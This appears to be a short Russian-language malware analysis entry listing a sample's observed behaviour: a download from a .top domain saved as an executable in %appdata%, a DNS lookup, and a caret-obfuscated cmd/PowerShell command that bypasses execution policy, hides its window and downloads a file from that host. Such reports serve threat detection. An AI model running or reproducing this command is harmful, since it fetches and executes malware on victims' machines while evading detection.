Техническая информация
- http://zussipussicscds.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OW^e^rSHE^LL.EX^E^ -^e^xEC^U^t^i^on^P^ol^I^Cy^ Bypas^S -n^OP^r^o^f^IL^e^ ^-W^InD^owStyl^E HId^dEn (NE^W-obj^eCt^ s^ysT^e^M.NEt.W^e^b^C^LIen^t^).doWnLoAdf^iLE^('http://zussipuss...
- DNS ASK zu####ussicscds.top
- '<SYSTEM32>\cmd.exe' /C "P^OW^e^rSHE^LL.EX^E^ -^e^xEC^U^t^i^on^P^ol^I^Cy^ Bypas^S -n^OP^r^o^f^IL^e^ ^-W^InD^owStyl^E HId^dEn (NE^W-obj^eCt^ s^ysT^e^M.NEt.W^e^b^C^LIen^t^).doWnLoAdf^iLE^('http://zussipuss...' (со скрытым окном)